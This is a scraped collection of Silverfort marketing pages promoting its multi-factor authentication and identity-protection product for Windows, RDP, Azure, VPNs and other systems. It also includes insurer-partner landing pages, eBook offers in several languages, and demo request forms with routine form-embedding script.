Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows-server-login/ Secure your Windows Server Login with ease using Silverfort’s advanced MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-windows-server/ Secure your Windows Server with ease, with Silverfort’s adaptive MFA solution. Silverfort offers a powerful solution for secure multi-factor authentication (MFA) for Windows Server. Our innovative platform enables organizations to easily and efficiently implement MFA, reducing the risk of unauthorized access and protecting sensitive data. With Silverfort’s cutting-edge technology, you can ensure that only authorized users can access your Windows Server, while our advanced risk analytics and anomaly detection features provide additional protection against cyber threats targeting areas such as NTLM vulnerabilities and Certifried Attacks . Discover how Silverfort can help strengthen your security posture and protect your critical assets today. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-rdp/ Safeguard sensitive data and systems accessible via RDP with MFA. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-rdp-azure/ Fortify your Azure defenses with Silverfort’s end-to-end agentless MFA solution for RDP Silverfort is the leading provider of comprehensive MFA solutions that can easily be applied to any platform. We understand the importance of secure remote access to cloud environments which is why we offer an MFA solution tailored specifically for RDP Azure. For organizations utilizing Azure for cloud services, incorporating MFA into Azure’s RDP sessions is a key security measure. By integrating Silverfort’s MFA with Azure RDP, an extra layer of security is added. Users attempting to access RDP sessions hosted on Azure are required to authenticate through Silverfort’s MFA system. This ensures enhanced security in the cloud environment, providing a safeguard against unauthorized access and potential breaches. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-azure/ Secure Your Azure Cloud with Silverfort’s Advanced MFA Solution – Protecting Your Organization’s Data and Resources. Silverfort is a multi-factor authentication (MFA) solution for Azure that provides comprehensive protection for identities, assets, and applications. With Silverfort, you can secure access to sensitive data and applications from unauthorized access, including phishing and other sophisticated cyber-attacks. Silverfort supports a wide range of authentication methods, including biometrics, smart cards, and token-based authenticators. It seamlessly integrates with Azure Active Directory to provide smooth and secure access to all Azure resources. Whether you’re managing dozens or thousands of identities, Silverfort ensures your organization remains secure, compliant, and efficient while improving productivity and reducing costs. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-remote-desktop-gateway/ Secure remote access made easy with Silverfort’s MFA solution for Remote Desktop Gateway. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-rdp-okta/ Increase your network’s resilience and secure your RDP access with Silverfort’s agentless MFA solution --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-domain-admin-accounts/ Securing your organization’s crown jewels with Silverfort – Unbeatable Multi-Factor Authentication for Domain Admin Accounts --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-privileged-accounts/ Unlock the power of privileged accounts with uncompromising security – Silverfort’s MFA solution has got you covered. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-on-premises-applications/ Protect your on-premises apps with ease – Silverfort’s seamless MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-banking/ Protect your sensitive banking resources with Silverfort’s MFA solution. Silverfort enables banking firms to implement secures access to their banking infrastructure with unprecedented accuracy and efficiency. Our solution takes care of all your MFA needs – from device-based authentication to biometric authentication. With Silverfort, you can provide your customers with a seamless and secure banking experience, while safeguarding their personal and financial information from cyber attackers. Get in touch with us today to learn more! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-legacy-applications/ Secure your legacy applications with Silverfort: multi-factor authentication made simple. Silverfort enables companies to enhance their security posture without requiring any changes to the existing infrastructure or moving data to the cloud. The solution is simple to deploy, highly scalable, and provides end-to-end protection to users accessing legacy systems, ensuring that only authorized personnel can access critical applications and data. With Silverfort, companies can add an extra layer of security to their legacy systems, making them less vulnerable to cyber attacks and ensuring compliance with regulatory requirements. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-powershell/ Secure and streamline your Powershell environment with Silverfort’s seamless MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-psexec/ Strengthen your defenses with Silverfort’s MFA solution for secure PsExec. Silverfort provides a unique and innovative solution for MFA for PsExec, enabling customers to secure their environment and prevent unauthorized access. With Silverfort, customers can easily implement multi-factor authentication for any PsExec session, without the need for agents or proxies. Silverfort uses AI-driven risk-based adaptive authentication and delivers seamless user experience and unparalleled coverage. By deploying Silverfort, customers can enhance their security posture, meet compliance requirements, and gain wider visibility and control over their environment. Sign up now and experience the benefits of Silverfort’s MFA for PsExec solution! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-desktop/ Simplify security with Silverfort: Robust MFA for Desktop and Cloud, no agents required. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-office-365/ Fortifying Office 365’s Security: One Step at a Time with Silverfort’s MFA Solution. Silverfort provides a seamless and innovative solution for multi-factor authentication (MFA) for Office 365, ensuring secure access to your data and applications. With Silverfort, you can add MFA protection to all your cloud and on-premises systems, without any agent or software installation required. Our unique platform uses AI-based risk analysis and adaptive authentication to detect and block any potential threats, while also enabling hassle-free user experience. Discover how Silverfort’s MFA solution can help you ensure the highest level of security for your Office 365 environment. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-teams/ Multi-factor authentication made simple for stronger team security with Silverfort. Silverfort provides a breakthrough solution for Multi-Factor Authentication (MFA) for Teams that delivers seamless security without compromising productivity. Silverfort enables adaptive authentication that dynamically adapts to changes in user behavior, risk factors, and threats. This eliminates the need for cumbersome and time-consuming authentication methods while enhancing protection against insider and external threats. Silverfort’s MFA for Teams will elevate your team’s security, streamline access control, and increase your overall efficiency and profitability. Experience the benefits of advanced authentication with Silverfort’s MFA for Teams today! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-remote-access/ Secure your remote access with Silverfort, the ultimate MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-root-user/ Elevate your security with Silverfort MFA – the ultimate solution for Root User protection. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-outlook/ Secure your Outlook with Silverfort MFA – the ultimate protection against unauthorized access. Silverfort is the perfect solution for businesses or organizations that use Outlook and need a reliable multi-factor authentication system. With Silverfort, you can secure your emails and data against cyber attacks by implementing a powerful MFA system that is designed to give you the utmost level of protection. Our solution is easy to install and use, and it works seamlessly with Outlook, ensuring that you can continue to work without disruption while keeping your sensitive information safe. With Silverfort, you can guarantee the highest level of security for your business or organization and protect yourself against the latest cyber threats. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-linux/ Strong authentication and risk-based adaptive policies to secure access to all your Linux servers and applications --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-vpn/ Safeguarding your VPN remote access with Agentless MFA. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-forticlient-vpn/ Secure your VPN connections with ease – with Silverfort’s MFA for Forticlient VPN. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-palo-alto-vpn/ Uncompromising security for Palo Alto VPN with Silverfort’s seamless MFA solution. Silverfort provides a secure and seamless multi-factor authentication (MFA) solution for Palo Alto VPN. Using advanced AI technology, Silverfort can authenticate users and devices in real-time, providing continuous protection against account takeover attacks, phishing, and other cyber threats. Silverfort’s agentless and proxyless architecture allows it to secure all user resources without blind spots, including Palo Alto VPNs. It can enforce adaptive policies and advanced secure access controls across all resources, access interfaces, and users in the hybrid environment. Integrating Silverfort’s MFA with a Palo Alto VPN ensures that users accessing the network through the VPN must authenticate using more than just their primary credentials, such as through a one-time passcode, a mobile app notification, or other MFA methods. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-meraki-vpn/ Enforce MFA without requiring modifications to endpoints or servers for secure remote access. Silverfort’s solution for MFA for Meraki VPN offers advanced security and access control measures that protect organizations from cyber threats. With Silverfort, users can enjoy seamless access to Meraki VPN while ensuring the highest level of security through biometric and behavioral analysis technologies. Silverfort’s agentless approach and its ability to enforce MFA without requiring modifications to endpoints or servers make it a flexible choice for enhancing the security of VPN access, including those provided by Meraki. Silverfort also provides a unified platform that manages various authentication methods, including mobile apps, tokens, and biometrics, while enabling organizations to meet compliance requirements. Whether it’s preventing unauthorized access or identifying potential attacks, this extra layer of security is particularly important for VPNs, as they provide remote access to an organization’s internal network, and are therefore a crucial point to secure against unauthorized access. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-vcenter/ Apply MFA. protection for vCenter with Silverfort’s Advanced Solution Silverfort is a cutting-edge cybersecurity solution that provides seamless multi-factor authentication (MFA) for vCenter. Our advanced technology replaces traditional MFA methods with a risk-based adaptive authentication protocol. Leveraging our AI-based technology, Silverfort enables secure access to vCenter for all users, including those coming from non-human and unmanaged sources. Say goodbye to cumbersome, time-consuming MFA processes. With Silverfort, you get lightning-fast, adaptive, and comprehensive MFA for vCenter that ensures maximum security without slowing you down. Try our solution today and experience the difference. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-vmware/ Revolutionizing MFA for VMWare: secure privileged access to vCenter, one authentication at a time. Silverfort is a cutting-edge cybersecurity solution that offers multi-factor authentication (MFA) for VMWare environments. With its AI-driven risk engine, Silverfort provides adaptive and frictionless MFA across cloud, hybrid, and on-premises infrastructures for secure privileged access to vCenter. Our agentless architecture ensures zero downtime and easy deployment, while its granular policies allow for customizable security controls. Silverfort’s MFA solution for VMWare ensures that only authorized users can access your virtual machines, ESXi hosts and its dependent components, protecting your business against cybersecurity threats and data breaches. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-juniper/ Secure access for the most complex networks with Silverfort’s cutting-edge MFA for Juniper. Silverfort is the next-generation solution for multi-factor authentication (MFA) for Juniper. We offer a unique agentless solution that extends secure access to any sensitive resource, including those on-premises, in the cloud, and across hybrid environments. Our platform enables granular access controls and policy enforcement, as well as a seamless user experience across all applications. With Silverfort, you can easily integrate MFA into your existing infrastructure to reduce risk while improving security posture. Get started today with Silverfort’s MFA for Juniper. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-jenkins/ Secure your Jenkins with ease – Silverfort’s MFA solution has got you covered. Silverfort offers a revolutionary solution for implementing MFA for Jenkins. With Silverfort, organizations can now provide a secure and seamless experience to their users, eliminating the need for passwords and protecting against identity theft and other cyber threats. The platform supports all authentication methods, including biometrics, smart cards, and push notifications, making it the most flexible and adaptable MFA solution on the market. So if you want to secure your Jenkins environment and prevent unauthorized access, Silverfort has you covered. Try it today! --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-jira/ Streamline Jira authentication with Silverfort’s MFA solution – safeguard your projects and productivity. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-web-applications/ Secure your web applications with ease – Silverfort’s MFA solution has you covered Silverfort is a cutting-edge cybersecurity solution that provides multi-factor authentication (MFA) for web applications. With the growing threat of cyberattacks, it has become increasingly critical to have strong security protocols in place to protect valuable information. Silverfort utilizes adaptive risk analysis and artificial intelligence to determine the level of risk associated with each user’s login attempt, ensuring that only authorized individuals can access sensitive data. With this powerful technology, businesses can rest assured that their web applications are highly secure and protected from potential breaches. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-servers/ Secure your servers with ease – give Silverfort’s MFA solution a breeze. Silverfort’s solution for Multi-Factor Authentication for Servers offers a revolutionary approach to securing corporate networks. By leveraging an agentless architecture, it easily integrates with any server, eliminating the need for expensive hardware or software installations. It provides a comprehensive security solution that combines machine learning with adaptive access controls, making it possible to protect against even the most advanced threats. With Silverfort, organizations can easily secure their servers, meet regulatory and compliance requirements, and reduce the risk of unauthorized access to their sensitive information. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-vdi/ Secure your virtual world seamlessly with Silverfort’s MFA solution for VDI. Silverfort provides a unified MFA (multi-factor authentication) solution for VDI (Virtual Desktop Infrastructure), addressing the security challenges of modern enterprises. Our platform seamlessly integrates with your existing environment, allowing you to implement MFA across all your resources without changes to your applications, endpoints, or network. Silverfort’s AI-powered risk engine continuously analyzes user behavior and device health, providing instant adaptive authentication to grant access to authorized users and block attackers, even if they have stolen credentials. Sign up today and safeguard your organization from the increasing threat of cyber attacks. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-network-devices/ Secure your network devices with ease, using Silverfort’s MFA solution! Networking devices including routers, switches, and firewalls are attractive targets for malicious actors seeking to exploit them, disrupt services, or gain unauthorized access to sensitive resources. Consequently, the need to safeguard networking devices has become a paramount concern, not only for the integrity and availability of data and services but also for overall organizational security. To address these challenges, Silverfort provides a multi-factor authentication (MFA) protection layer for all networking gear --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-b2b/ Implement secure access with Silverfort’s MFA solution – protecting your B2B network has never been easier. Silverfort offers a cutting-edge solution for B2B companies to secure their networks with multi-factor authentication (MFA). Their innovative platform integrates with any system or application, providing seamless MFA for all users and devices. With Silverfort, businesses can protect valuable data, prevent unauthorized access, and comply with regulatory requirements without compromising user experience. Say goodbye to clunky and inconvenient authentication methods, and hello to simple, yet robust security with Silverfort. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-business/ Deploy secure authentication without compromise with Silverfort’s MFA solution for businesses. Silverfort is a powerful MFA (multi-factor authentication) solution for businesses that helps to prevent unauthorized access to sensitive data by adding an extra layer of security. Silverfort integrates with existing authentication systems and can detect and handle any type of authentication method, including biometrics and one-time passwords. This makes it easier for businesses to manage access to their systems and data, while also reducing the risk of data breaches. With Silverfort, businesses can have peace of mind knowing that their data is protected by an advanced MFA solution. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-user-interface-logins/ Securing your digital world with seamless MFA for every UI, powered by Silverfort. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-healthcare/ Protecting patient data with peace of mind – Silverfort’s seamless MFA solution for healthcare. Silverfort provides a powerful authentication platform that ensures secure access to sensitive healthcare data. Its advanced Multi-Factor Authentication (MFA) solution offers complete protection against identity theft, privileged access abuse, and other security risks. With Silverfort, healthcare organizations can efficiently unify and manage all MFA policies across their enterprise, saving time and increasing compliance. With features such as adaptive authentication, continuous risk assessment, and zero-trust capabilities, Silverfort makes MFA easy and effective for medical professionals and patients. Protect your healthcare data with Silverfort today. --- - Published: 2023-07-31 - Modified: 2024-09-12 - URL: https://www.silverfort.com/use-cases/mfa-for-aws-workspaces/ Secure AWS Workspaces with ease – Silverfort’s MFA solution has got you covered! Silverfort provides a revolutionary Multi-Factor Authentication (MFA) solution for AWS Workspaces that allows organizations to strengthen their security posture by securing access to critical resources. With Silverfort, users can log in securely to AWS Workspaces using their preferred authentication method, including biometric or contextual factors. This helps eliminate the need for passwords making your workspace deployments more secure. By streamlining authentication workflows, Silverfort reduces the risk of cyber breaches and ensures compliance with regulatory requirements. --- - Published: 2023-07-25 - Modified: 2024-09-13 - URL: https://www.silverfort.com/silverfort-for-travelers-customers/ Welcome Travelers Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. Free Assessment Real-Time Protection Against Identity Threats 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access polices to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn’t rely on agents or proxies with no code changes required ensure the solution gets fully deployed in mere days Gain insight into your environment’s security posture with Silverfort’s free Identity Security Assessment. --- - Published: 2023-07-07 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-ins-requirements-thn-em-jul23/ Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2023-06-26 - Modified: 2025-08-25 - URL: https://www.silverfort.com/partners/microsoft/ Silverfort & Microsoft Silverfort and Microsoft’s product integrations help organizations to consolidate their IAM across hybrid environments, extend identity protection to any asset, and simplify cloud migration Silverfort Integrations with the Microsoft Ecosystem Entra ID Consolidate the identity protection of all on-prem and cloud resources in Entra ID (formerly Azure AD), making it a single interface to configure access policies for your entire hybrid environment Defender Suite Trigger MFA protection as a follow-up to Defender’s detection of identity threats, complementing it with real-time prevention Azure MFA Extend Azure MFA to resources that couldn’t be protected with MFA before ADFS Protect access of all users to SaaS applications and on-prem resources from a single interface with full context to all user activities in the hybrid environment “The integration with Silverfort allows customers to extend the power and flexibility of Entra ID to many additional resources and applications across hybrid and multi-cloud environments, and unify their identity management and protection on Entra ID. ” Sue Bohn | Partner Director, Microsoft Identity Division --- - Published: 2023-06-15 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-alliant-customers/ Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. --- - Published: 2023-06-15 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-insuretrust-customers/ Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. --- - Published: 2023-05-22 - Modified: 2024-11-04 - URL: https://www.silverfort.com/the-dark-side-of-ransomware-protection-ppc/ Can you block lateral movement? Ransomware attacks are a top concern for enterprise security stakeholders, particularly the pairing of ransomware with automated propagation. Download this eBook to learn: What are the security gaps in traditional MFA solutions? What makes propagation a blind spot for today’s security products? How does Silverfort’s Unified Identity Protection platform proactively prevent ransomware propagation? And more --- - Published: 2023-05-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/find-a-partner/ We are all about matching you with the right partner. Looking for a specific reseller? Need an identity specialist to help with your IAM projects? We’ll find your perfect match. Just complete a few questions, and someone on our team will contact you soon. --- - Published: 2023-04-25 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-de/ What is your identity protection challenge? Fill out the form below and we’ll contact you to schedule an online or on-site demo. --- - Published: 2023-04-25 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-fr/ What is your identity protection challenge? Fill out the form below and we’ll contact you to schedule an online or on-site demo. --- - Published: 2023-04-20 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-mfa-ad-fr/ Remplissez ce formulaire pour organiser une démonstration. Si vous avez un Active Directory, il est probable que de nombreuses authentifications et accès ne soient pas protégés avec du MFA. Par exemple les veilles applications, les outils en ligne de commande (Powershell, PsExec, WMI... ) ou les partage de fichiers. Voici comment va se dérouler la discussion: Nous allons vous écouter et comprendre vos besoins. Réaliser une démonstration qui répond à vos problématiques. Répondre à vos questions. --- - Published: 2023-04-18 - Modified: 2024-09-10 - URL: https://www.silverfort.com/silverfort-for-at-bay-customers/ Welcome At-Bay Cyber Clients! Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. REGISTER HERE window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "bd9c2d06-63f5-46a1-b1d6-81e3439f564d", target: "#hbspt-form-bd9c2d06-63f5-46a1-b1d6-81e3439f564d", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. querySelector("#hbspt-form-bd9c2d06-63f5-46a1-b1d6-81e3439f564d"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } 01 MFA Everywhere Enforce MFA protection across all administrative access, including command-line access, legacy applications, file shares, and other resources that couldn’t be protected before 02 Securing Service Accounts Gain full visibility into your service accounts’ inventory, activity, and behavior, and apply auto-created access polices to alert or block their access if they become compromised 03 Rapid and Effortless Deployment Innovative technology that doesn’t rely on agents or proxies with no code changes required ensure the solution gets fully deployed in mere days Learn More About the Silverfort Platform --- - Published: 2023-04-03 - Modified: 2024-11-04 - URL: https://www.silverfort.com/comply-with-the-new-cyber-insurance-requirements-ppc/ Everyone knows the value of cyber security insurance, but keeping up with the requirements of cyber security insurance plans can be tricky. As ransomware attacks increase worldwide, complying with the checklist of resources requiring MFA coverage grows more challenging. In this eBook, we’ll help you make sense of what you’ll need. Explore this eBook to discover: What types of MFA are required for cyber liability insurance How to evaluate cyber security insurance solutions How to comply with MFA insurance requirements with minimal disruption to your network And more --- - Published: 2023-04-03 - Modified: 2024-11-04 - URL: https://www.silverfort.com/silverfort-for-aig-clients/ Silverfort empowers organizations to secure their environments from identity threats such as account takeover, lateral movement and ransomware spread. Our technology turns the tables on adversaries’ attack techniques, preventing in real time any attack that utilizes compromised credentials for malicious access to targeted resources. This is why leading insurers rely on us to mitigate cyberattack risks for their clients. --- - Published: 2023-04-03 - Modified: 2024-11-04 - URL: https://www.silverfort.com/re-evaluate-your-mfa-are-you-as-protected-as-you-should-be/ Multi-factor Authentication (MFA) protection is a key component in any organization’s security stack, but ultimately, only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk. In this eBook, we’ll explore the critical importance of comprehensive MFA protection and a number of other topics, including: What are the security gaps in traditional MFA solutions? How can you assess your existing MFA protection to better understand your risk exposure? How can you gain end-to-end MFA coverage for all your cloud and on-prem resources? And more --- - Published: 2023-03-29 - Modified: 2024-11-04 - URL: https://www.silverfort.com/leading-manufacturer-averts-lateral-movement/ The manufacturing industry has become a ripe target for cyber-attacks over the last decade. Whether due to vulnerable hybrid environments, unprotected legacy systems or simply because they’re susceptible to highly disruptive attacks, manufacturing firms have become a highly lucrative target for threat actors. This report highlights how one leading manufacturer beat the odds and stopped a lateral movement attack on their supply chain right in its tracks. Explore this case study to learn about: Typical supply chain risks in the interconnected cyber space New types of lateral movement attacks Mitigating the risk of NTLM authentications Utilizing Silverfort’s logs for early threat detection And more --- - Published: 2023-03-20 - Modified: 2024-11-04 - URL: https://www.silverfort.com/4-steps-to-comprehensive-service-account-security-thn/ There are countless service accounts in any given organization and today, the number of these non-human accounts, and the number of applications that rely on them, is growing each day. These accounts can become high-risk assets that, if left unchecked, may enable threats to propagate throughout the network undetected. Download this eBook to learn how to: Automatically detect all service accounts Monitor and analyze the use of these sensitive accounts Recommend policies that can easily be turned on to secure the use of these accounts Actively prevent account takeover and alert on suspicious behavior window. addEventListener("message", (ev) => { if (ev. data. type === 'hsFormCallback' && ev. data. eventName === 'onFormReady') { window. hero = new RevenueHero({ routerId: '1251' }) hero. schedule('hsForm_6432a41a-4dc5-45c9-8419-971d96121c55') } }); --- - Published: 2023-03-01 - Modified: 2024-11-04 - URL: https://www.silverfort.com/webinar-on-demand-can-you-block-lateral-movement-in-real-time/ https://www. youtube. com/watch? v=SgyVeXoG-cc --- - Published: 2023-02-02 - Modified: 2024-11-04 - URL: https://www.silverfort.com/cyber-insurance-free-assessment/ GET A FREE IDENTITY SECURITY ASSESSMENT Identify the MFA and privileged access protection gaps you must resolve to qualify for a cyber insurance policy Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment so you can meet your insurer’s requirements: Administrative users that require MFA protection Service accounts’ inventory, privileges, and activities Identity protection hygiene issues and exposed attack surfaces Active identity threats that take place in your environment --- - Published: 2023-01-08 - Modified: 2024-11-04 - URL: https://www.silverfort.com/lp-hybrid-iam-azure-ebook-de/ Gewinnen Sie gegen fortschrittliche Bedrohungsakteure mit umfassendem, ressourcenübergreifendem Zugriff mit geringsten Rechten. Identitätsbasierte Angriffe haben an Raffinesse und Umfang zugenommen. Die Fähigkeit, proaktiv das häufige Szenario zu verhindern, in dem ein Angreifer kompromittierte Anmeldedaten für einen böswilligen Zugriff nutzt, ist jetzt ein Muss. In unserem eBook erfahren Sie, wie Sie mit Silverfort und Azure AD in nur drei einfachen Schritten echtes Identity Zero Trust erreichen können. Möchten Sie mehr erfahren? Laden Sie das eBook noch heute herunter. Weitere Informationen finden Sie auf dem Microsoft Azure Marketplace. --- - Published: 2023-01-08 - Modified: 2024-11-04 - URL: https://www.silverfort.com/lp-cyber-insurance-ebook-de/ Jeder kennt den Wert einer Cyberversicherung, aber es kann schwierig sein, mit den Anforderungen an die Cyberversicherung Schritt zu halten. Da Ransomware-Angriffe weltweit zunehmen, wird es immer schwieriger, die Checkliste der Anforderungen einzuhalten, die eine MFA-Deckung erfordern.   Wir helfen Ihnen dabei, sich einen Überblick darüber zu verschaffen, was Sie benötigen.   Laden Sie dieses eBook herunter und erfahren Sie mehr :  Welche Arten von MFA für die Cyber-Haftpflichtversicherung erforderlich sind. Wie Sie Cyberversicherungslösungen bewerten. Wie Sie die MFA-Versicherungsanforderungen mit minimaler Unterbrechung Ihres Netzwerks erfüllen können. --- - Published: 2023-01-08 - Modified: 2024-11-04 - URL: https://www.silverfort.com/4-steps-to-comprehensive-service-account-security-lp-de/ In jedem Unternehmen gibt es unzählige Dienstkonten, und die Zahl dieser nicht-menschlichen Konten und der Anwendungen, die auf sie angewiesen sind, nimmt täglich zu. Diese Konten können zu Hochrisiko-Assets werden, die es Bedrohungen ermöglichen, sich unentdeckt im gesamten Netzwerk zu verbreiten, wenn sie nicht kontrolliert werden.   Laden Sie dieses eBook herunter und erfahren Sie, wie Sie:  Automatisch alle Dienstkonten erkennen Die Nutzung dieser sensiblen Konten überwachen und analysieren Richtlinien empfehlen, die einfach aktiviert werden können, um die Nutzung dieser Konten zu sichern Die Übernahme von Konten aktiv zu verhindern und bei verdächtigem Verhalten zu warnen --- - Published: 2022-12-13 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-mfa-fr/ Remplissez ce formulaire pour organiser une démonstration. Si vous avez un Active Directory, il est probable que de nombreuses authentifications et accès ne soient pas protégés avec du MFA. Par exemple les veilles applications, les outils en ligne de commande (Powershell, PsExec, WMI... ) ou les partage de fichiers. Voici comment va se dérouler la discussion: Nous allons vous écouter et comprendre vos besoins. Réaliser une démonstration qui répond à vos problématiques. Répondre à vos questions. --- - Published: 2022-11-16 - Modified: 2024-11-04 - URL: https://www.silverfort.com/lp-hybrid-iam-consolidation-azure-ad-fr/ Gagnez contre les attaquants avec la mise en place sur les authentifications de l’AD d’un contrôle d’accès renforcé et généralisé à l’aide d’Azure AD.  La solution est directement disponible dans la marketplace Microsoft. Dans notre eBook, explorez comment Silverfort, connecté à votre AD et Azure AD, vous permet de mettre en place le Zero Trust sur les identités en 3 étapes seulement.   Prêt pour en savoir plus ? Téléchargez l’eBook aujourd’hui. --- - Published: 2022-11-15 - Modified: 2024-11-04 - URL: https://www.silverfort.com/lp-4-steps-to-comprehensive-service-account-security-fr/ Les comptes de services sont désormais largement utilisés dans les entreprises. Le nombre d’applications qui en dépendent grandit de jour en jour. Cependant ces comptes peuvent devenir des cibles pour les attaquants, leur permettant de se propager dans votre infrastructure.   Téléchargez ce guide pour apprendre comment:  Détecter automatiquement tous les comptes de service Surveiller et analyser l’usage de ces comptes à hauts pouvoirs Mettre en place des politiques d’accès permettant de les sécuriser sans modifier vos applications ni changer vos mots de passe Prévenir activement la prise de contrôle de ces comptes et détecter les comportements anormaux --- - Published: 2022-10-27 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-ci/ Fill out the form to schedule a demo. Need to apply MFA to privileged accounts or legacy applications to comply with cyber insurance regulations? We’ve got you covered. Here’s what happens when you speak with us: We’ll listen. We want to understand your identity protection needs. We’ll demonstrate how our platform addresses your specific concerns. You’ll have all your questions answered. --- - Published: 2022-10-27 - Modified: 2024-11-04 - URL: https://www.silverfort.com/request-a-demo-lp-mfa/ Fill out the form to schedule 